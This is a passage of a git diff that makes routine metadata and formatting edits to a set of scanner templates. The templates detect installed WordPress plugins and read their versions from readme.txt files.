4a0a0047304502205923239d1b282ec36109c5607332d8577b680604b6eea5907b6b7e4e1f4a406b022100ba936802f9c9d4d1ebd04a5686e89be54913f4f30333267fb66389c060d5825c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 2f59c83cc6..e5c2f38c22 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3e7fc3a85f8c6641447a3cb8025d18d4ab9107f45e92aed1ef00e9dacc35e2c022100c3666f74b742c21f71ef4b63327f68d574374d48ef214d5939fddad3d45182b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b3e7fc3a85f8c6641447a3cb8025d18d4ab9107f45e92aed1ef00e9dacc35e2c022100c3666f74b742c21f71ef4b63327f68d574374d48ef214d5939fddad3d45182b6:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 0d699b3576..769779579f 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fa8f6251aebc907f4cbefad3634a81205017112a13c2e6f4227112ff3764cbe702205dd33391abc7c3e959d37fdfe5896c11ee6faac75cd1823926a2305e7cf4c3e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fa8f6251aebc907f4cbefad3634a81205017112a13c2e6f4227112ff3764cbe702205dd33391abc7c3e959d37fdfe5896c11ee6faac75cd1823926a2305e7cf4c3e7:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 7837443fbb..f05f43aab4 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200eea834b1cfe14a4d8848eb27eb3bdca09b98f6d2cdf2212310d928a37b68aed022100ba59081f00ca79eec92ef126dcda731436a439774f31f6283270e7913867545c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200eea834b1cfe14a4d8848eb27eb3bdca09b98f6d2cdf2212310d928a37b68aed022100ba59081f00ca79eec92ef126dcda731436a439774f31f6283270e7913867545c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7d57ae4745..f6371f2105 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022073adcf633fe453e9e865e833d95b39cf6c3db15e72534dfb92814844cf5353c0022037ba9af8cbb90d63b0466af2369fedaa9a87a5eda6bc269ed68e6675074f8fec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022073adcf633fe453e9e865e833d95b39cf6c3db15e72534dfb92814844cf5353c0022037ba9af8cbb90d63b0466af2369fedaa9a87a5eda6bc269ed68e6675074f8fec:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index a9e2944c12..6937122da8 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a2b51ce254c76e027dc3cf8752d268e6f01081fdfbdd0b28f684f00deb25c678022073f07ed0e3eee2bf11b1107ebe2bdfff4c81d7bb825117c07fef7fa348e22e2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a2b51ce254c76e027dc3cf8752d268e6f01081fdfbdd0b28f684f00deb25c678022073f07ed0e3eee2bf11b1107ebe2bdfff4c81d7bb825117c07fef7fa348e22e2c:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1d78b00887..66a7bcc0c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000c09151531632ce74eac0db54a7f17cd8c2cca3aeccb6b6aafb42aea36a7b1b02204af3991583a6612806566944dc6e9306d14876f59fb2f597f9b193e6d3b4f25e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022000c09151531632ce74eac0db54a7f17cd8c2cca3aeccb6b6aafb42aea36a7b1b02204af3991583a6612806566944dc6e9306d14876f59fb2f597f9b193e6d3b4f25e:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 92bf239e8d..d10e11f9dd 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100af29737bf52cc420e96a54e7889ae04184e8b06a0ce4784e1322a1d47bedf9fa022100b20bf65b4d3847466ea2a95de239158105ce75ba102c716b6d849f99403a9f56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100af29737bf52cc420e96a54e7889ae04184e8b06a0ce4784e1322a1d47bedf9fa022100b20bf65b4d3847466ea2a95de239158105ce75ba102c716b6d849f99403a9f56:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 6a160a9a70..9ef093b78a 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220177a2d7ee7de1d4c7d73aaa39a28e71ea3b0ff9e86fe9aaaf9cd4df13c2259c9022022f5bf9a0532e0976c88c1f82a7c758d84dca8a5c7fc3364b38a5ae71ddc3560:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220177a2d7ee7de1d4c7d73aaa39a28e71ea3b0ff9e86fe9aaaf9cd4df13c2259c9022022f5bf9a0532e0976c88c1f82a7c758d84dca8a5c7fc3364b38a5ae71ddc3560:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 4ee86eb68d..31dc7f5b41 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b9ad24529fb88e61c3c7786ea8e433acc711a7583a63773a8b164b65ae44fad8022100b3615ed36a90c653bf1dec0396d91b8aeeef35c9093ea884a06c66630640106f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b9ad24529fb88e61c3c7786ea8e433acc711a7583a63773a8b164b65ae44fad8022100b3615ed36a90c653bf1dec0396d91b8aeeef35c9093ea884a06c66630640106f:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index f2c314bf46..62aa9c9b82 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100abaf6be76d15b4e93d0476e197f60eb7fb484b53bd4a8dc0bd8242e71b10c2d002210085f87523cf63397e69707d470e2d16512ff18f42974a652fb44dae68c0cf1cf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100abaf6be76d15b4e93d0476e197f60eb7fb484b53bd4a8dc0bd8242e71b10c2d002210085f87523cf63397e69707d470e2d16512ff18f42974a652fb44dae68c0cf1cf5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 1eadccd874..f5b8bbe161 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/use-any-font/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022075539f26b293aa5f673916f1c47510d4b9915eb6fa13a4780bd2af3185b557d2022009e48497d4a39bc5876b852685ab08661d0bc6d85c16c2ceff5c62239f9da1f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022075539f26b293aa5f673916f1c47510d4b9915eb6fa13a4780bd2af3185b557d2022009e48497d4a39bc5876b852685ab08661d0bc6d85c16c2ceff5c62239f9da1f1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 1c7c8d672d..0b7f0c4bf5 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200deee2bd5a21b875c938d8b1d234f728de21c335ff7ea43e5d052084ffb83083022053f43f9712527be692f64c2d5dbf49061707b8af543686a754ea879fe5f1cbf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200deee2bd5a21b875c938d8b1d234f728de21c335ff7ea43e5d052084ffb83083022053f43f9712527be692f64c2d5dbf49061707b8af543686a754ea879fe5f1cbf5:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index b6dab891ce..0c8139736d 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/velvet-blues-update-urls/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204796397351bcbd8981e563eae4aadd56d7730e6f2990c4a39741614ddd07382a022100d67ae285e03977652f1d355c488e98073e50b2c9844a53cb70eb79dc94a35a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502204796397351bcbd8981e563eae4aadd56d7730e6f2990c4a39741614ddd07382a022100d67ae285e03977652f1d355c488e98073e50b2c9844a53cb70eb79dc94a35a60:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index e4bb1f57a4..98bf8b73ca 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204fb67f0f83a14b80563784fb7704bac46274427329ed08a4d1f2dcaac2438f9c02204203220776ee282f95c4ff280d5692d3b2c6f7631d65ce24fc434f6387fe68fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204fb67f0f83a14b80563784fb7704bac46274427329ed08a4d1f2dcaac2438f9c02204203220776ee282f95c4ff280d5692d3b2c6f7631d65ce24fc434f6387fe68fd:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 04b7890f4a..b1f4323c2e 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b6d9fc01d9272370739bc006bd9c03dd1ff26124c36fe170400b5f8baa5f9d2502202eda7ddc1db689d867d2c8bc2a7d49da703be769fa01fcd66384b97581f2557a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b6d9fc01d9272370739bc006bd9c03dd1ff26124c36fe170400b5f8baa5f9d2502202eda7ddc1db689d867d2c8bc2a7d49da703be769fa01fcd66384b97581f2557a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index de4d538304..abb534569b 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/webp-express/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022042080cbb6fc265136f8c870a3bdb9d645fa61fc21e7d83608bbaeb2d9a9cc5de02205096432ddda031b9d0ac2000784b81aa079c18967d1ebac737e546b284766419:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022042080cbb6fc265136f8c870a3bdb9d645fa61fc21e7d83608bbaeb2d9a9cc5de02205096432ddda031b9d0ac2000784b81aa079c18967d1ebac737e546b284766419:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index d084c73ef4..ff98467f81 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c04f2880c34eaef6f4053a1a35c859fe14acbc49dbc7b439b629803f8e9d227f02203574f2054b4dd9dbab6261d87788fc268207eb79937b9257314566ffa0a9be0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c04f2880c34eaef6f4053a1a35c859fe14acbc49dbc7b439b629803f8e9d227f02203574f2054b4dd9dbab6261d87788fc268207eb79937b9257314566ffa0a9be0a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index b05e7d8270..6202d23c2a 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022054b28181ed5e4592bf72c0cb5bfc5a482ea13ec941b354573c377b06ebb92da8022100b0bfed3ceec0de538c3b11066ad3266b2e6921eff7755d14f29bfd8a0c0fc5d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022054b28181ed5e4592bf72c0cb5bfc5a482ea13ec941b354573c377b06ebb92da8022100b0bfed3ceec0de538c3b11066ad3266b2e6921eff7755d14f29bfd8a0c0fc5d0:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index e08b9b79e2..3bd6d147d9 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c2780bddbb1e8349240c269f1b81f1aaf12aa6d484c67a645960a4c9a8f0490e022100dde3cb4ef9d76beb19f5819485ffd0aad6ef1ec718d9a5c7a54c90f90f9195c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c2780bddbb1e8349240c269f1b81f1aaf12aa6d484c67a645960a4c9a8f0490e022100dde3cb4ef9d76beb19f5819485ffd0aad6ef1ec718d9a5c7a54c90f90f9195c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 5b98016ee3..7135f18565 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048332072632b496cde31e5696245caa6b599394455f8dcd12351488a8d19fc38022100b7fe5d9c125168844accffee4287f070b31ebf9d1e46cb02f57f7dbd35d180aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022048332072632b496cde31e5696245caa6b599394455f8dcd12351488a8d19fc38022100b7fe5d9c125168844accffee4287f070b31ebf9d1e46cb02f57f7dbd35d180aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 9e1362dd7e..907e92840d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200bcd1c6581ec980a83878ce77a189c6b7ea12e35fa2fe2f5df01036863f2c567022100c8d092aad6d405307d98203afe356d849324b8ee99733e3aad63ddaa58dd6e3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200bcd1c6581ec980a83878ce77a189c6b7ea12e35fa2fe2f5df01036863f2c567022100c8d092aad6d405307d98203afe356d849324b8ee99733e3aad63ddaa58dd6e3a:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index ffa66a5821..7d28a6d01a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220175b9ec94f5da1d83b7607152e299260dfc0cb370b4cad8f8ceb41130af59f4e022100bf96473c3eb518eef9c12efa47bdb562816d2181de1b2d6ea34c093d781d5ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220175b9ec94f5da1d83b7607152e299260dfc0cb370b4cad8f8ceb41130af59f4e022100bf96473c3eb518eef9c12efa47bdb562816d2181de1b2d6ea34c093d781d5ba1:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index ffbbe75d22..31d6397d68 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c76af477a0a98f7cfc3d3d1024a9a7012793af9affc8818c4f4b099c907ef7f902201d5e6381d5f5328b3d24cca47af318333dacfce69798c9ed35b9d7c532e7058d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c76af477a0a98f7cfc3d3d1024a9a7012793af9affc8818c4f4b099c907ef7f902201d5e6381d5f5328b3d24cca47af318333dacfce69798c9ed35b9d7c532e7058d:922c64590222798bb761d5b6d8e72950 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index d333e18af6..945c082d2e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,13 +7,13 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" @@ -47,4 +47,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202cd99a595a0495dde2f207b86a232b939e47ae71d6fafb1fbaafc8da279683160220203a0aa9a1acca9419a04d3d1ee4909f46be2b36e73eaa0ca1a0feac9969174b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 